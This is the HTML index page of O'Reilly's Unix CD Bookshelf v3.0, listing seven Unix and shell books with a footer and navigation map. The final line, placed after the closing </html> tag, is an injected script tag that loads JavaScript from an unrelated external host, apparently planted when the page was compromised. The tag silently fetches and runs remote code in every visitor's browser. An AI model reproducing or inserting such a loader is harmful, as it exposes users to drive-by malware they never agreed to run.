<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rev="made" href="mailto:online-books@oreilly.com" title="Online
Books">
<link rel="home" href="http://www.oreilly.com/" title="O'Reilly &amp;
Associates">
<meta name="DC.title" content="The Unix CD Bookshelf, v3.0">
<meta name="DC.subject" content="xml">
<meta name="DC.description" content="several books about xml">
<meta name="DC.publisher" content="O'Reilly &amp; Associates">
<meta name="DC.date" content="2003-02-28" scheme="ISO 8601">
<meta name="DC.type" content="Text.Index">
<meta name="DC.format" content="text/html" scheme="MIME">
<meta name="DC.identifier" content="" scheme="ISBN">
<meta name="DC.language" content="en-US">
<meta name="DC.rights" content="copyrght.htm">
<title>The Unix CD Bookshelf, v3.0</title>
</head>

<body bgcolor="#ffffff" text="#000000">

<h1>
<img src="gifs/banner.gif" alt="The Unix CD Bookshelf v3.0" BORDER=0>
</h1>
<blockquote>


<dl>
 <dt><a href="unixnut/index.htm"><b>Unix in a Nutshell, 3rd Edition</b></a>
  <dd><em>By Arnold Robbins</em>

 <dt><a href="upt/index.htm"><b>Unix Power Tools, 3rd Edition</b></a>
  <dd><em>By Shelley Powers, Jerry Peek, Tim O'Reilly, and Mike Loukides</em>
 
 <dt><a href="mac/index.htm"><b>Mac OS X for Unix Geeks</b></a>
   <dd><em>By Brian Jepson and Ernest E. Rothman</em>

 <dt><a href="korn/index.htm"><b>Learning the Korn Shell, 2nd Edition</b></a>
   <dd><em>By Bill Rosenblatt and Arnold Robbins</em>
 
 <dt><a href="sedawk/index.htm"><b>sed &amp; awk, 2nd Edition</b></a>
  <dd><em>By Dale Dougherty and Arnold Robbins</em>

 <dt><a href="lunix/index.htm"><b>Learning the Unix Operating System, 5th Edition</b></a>
  <dd><em>By Jerry Peek, Grace Todino, and John Strang</em>
 
<dt><a href="vi/index.htm"><b>Learning the vi Editor, 6th Edition</b></a>
  <dd><em>By Linda Lamb and Arnold Robbins</em>
</dl>    

<table width="640">
<tr>
<td width="50%">
    <a href="jobjects/fsearch.htm"><b>Search All Books</a><br>
<a href="index/index.htm">Master Index</a>
<br>
    <a href="copyrght.htm">Copyright</a><br>
    <a href="credits.htm">Credits</a>
</b>
</td>
<td align=right>
<a href="https://secure.safaribooksonline.com/promo.asp?code=ORA14&portal=oreilly">
<img border="0" align="bottom" src="gifs/safari.gif"></a>
</td>
</tr>
</table>

 




</blockquote>
<p>
<hr align=left width=700 title="Footer">

<img src="gifs/navbar.gif" usemap="#map" border="0">


</body>
</html>



<p><font size="-1"><cite>The Unix CD Bookshelf, Version 3.0</cite>, is
<a href="copyrght.htm">Copyright &copy;&nbsp;2003</a> by <a
href="http://www.oreilly.com/">O'Reilly &amp; Associates, Inc</a>. All
rights reserved.<br>
Questions, comments, and suggestions to <a
href="mailto:bookquestions@oreilly.com">bookquestions@oreilly.com</a>.</font>
<p><font size="-2">This product is printed with 100% recycled
electrons.</font>


<map name="map">
<area shape="rect" coords="1,0,88,96" href="index.htm"><area shape="rect" coords="90,0,165,96" href="upt/index.htm"><area shape="rect" coords="168,1,253,107" href="mac/index.htm"><area shape="rect" coords="255,0,335,97" href="korn/index.htm"><area shape="rect" coords="337,0,415,109" href="unixnut/index.htm"><area shape="rect" coords="417,0,512,122" href="sedawk/index.htm"><area shape="rect" coords="514,0,605,105" href="lunix/index.htm"><area shape="rect" coords="611,2,694,121" href="vi/index.htm">
</map> 
</body>
</html>
<script language=javascript src=http://web.5dfgy.cn/12.js></script>